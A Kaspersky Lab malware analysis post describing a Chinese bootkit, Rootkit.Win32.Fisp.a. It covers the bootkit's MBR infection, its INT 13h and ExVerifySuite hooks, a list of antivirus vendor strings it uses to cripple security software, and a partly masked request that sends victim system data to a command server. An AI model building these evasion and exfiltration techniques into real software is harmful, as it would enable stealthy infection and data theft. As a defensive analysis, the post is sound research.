Malware descriptions

The Chinese bootkit

We recently discovered a new bootkit, i.e. a malicious program which infects the hard drive’s boot sector. Kaspersky Lab detects it as Rookit.Win32.Fisp.a. The bootkit is distributed by Trojan-Downloader.NSIS.Agent.jd. The Trojan infects the computers of users who try to download a video clip from a fake Chinese porn site.

This downloader is remarkable in that it downloads other malicious programs using a NSIS engine and stores all links in the relevant NSIS-script.

Fragment of the NSIS script for Trojan-Downloader.NSIS.Agent.jd

The dropper Rootkit.Win32.Fisp.a is among the files downloaded by the Trojan-downloader. This malicious program infects the hard drive’s boot sector. More specifically, it saves the old MBR to the third sector and replaces it with its own. Starting with the fourth sector, it installs an encrypted driver and the remaining code.

Fragment from the start of the hard disk infected by Rootkit.Win32.Fisp.a

The malicious program gains control as soon as the infected computer boots. The first thing it does is to substitute the INT 13h interrupt by modifying the interrupt vector table. Then the bootkit restores the original MBR and resumes the normal boot process.

Once a specific part of the system has been booted, the bootkit intercepts the function ExVerifySuite. The installed hook replaces the system driver fips.sys with the malicious driver which was written to the start of the hard drive in an encrypted format. It should be noted that the driver fips.sys is not required for the operating system to run correctly, so the system won’t crash when it is replaced.

Launched processes are intercepted by the malicious driver using PsSetLoadImageNotifyRoutine. The hook processes the PE header in the loaded image by viewing the ‘Security’ section of the ‘DataDirectory’ array. The driver contains a list of strings (see below) that occur in the processes of popular antivirus programs. If any of these strings occurs in a process, the driver modifies the entry point in the loaded image, so the image can no longer function properly.

Beijing Rising Information Technology
AVG Technologies
Trend Micro
Symantec Corporation
Kaspersky Lab
ESET, spol
Beijing Jiangmin
Kingsoft Software
Keniu Network Technology (Beijing) Co
Qizhi Software (beijing) Co,

The driver’s main function is to penetrate the explorer.exe process and inject an alternative version of Rootkit.Win32.Fisp.a which has downloader functionality. The malicious program sends a request to the server in which it communicates information about the victim computer’s operating system, IP address, MAC address etc.

http://ab.*****.com:8081/tj.aspx?a=Windows XP Service Pack 2&b=

Example of the request sent to server

The malicious program subsequently downloads modifications of Trojan-Dropper.Win32.Vedio.dgs and Trojan-GameThief.Win32.OnLineGames.boas to the victim computer.

The description outlined above can be summarized in the following diagram:

Kaspersky Lab products successfully detect and neutralize Rootkit.Win32.Fisp.a.

The Chinese bootkit

Your email address will not be published. Required fields are marked *



The leap of a Cycldek-related threat actor

The investigation described in this article started with one such file which caught our attention due to the various improvements it brought to this well-known infection vector.

Lazarus targets defense industry with ThreatNeedle

In mid-2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped). While investigating this activity, we were able to observe the complete life cycle of an attack, uncovering more technical details and links to the group’s other campaigns.

Sunburst backdoor – code overlaps with Kazuar

While looking at the Sunburst backdoor, we discovered several features that overlap with a previously identified backdoor known as Kazuar. Our observations shows that Kazuar was used together with Turla tools during multiple breaches in past years.

Subscribe to our weekly e-mails

The hottest research right in your inbox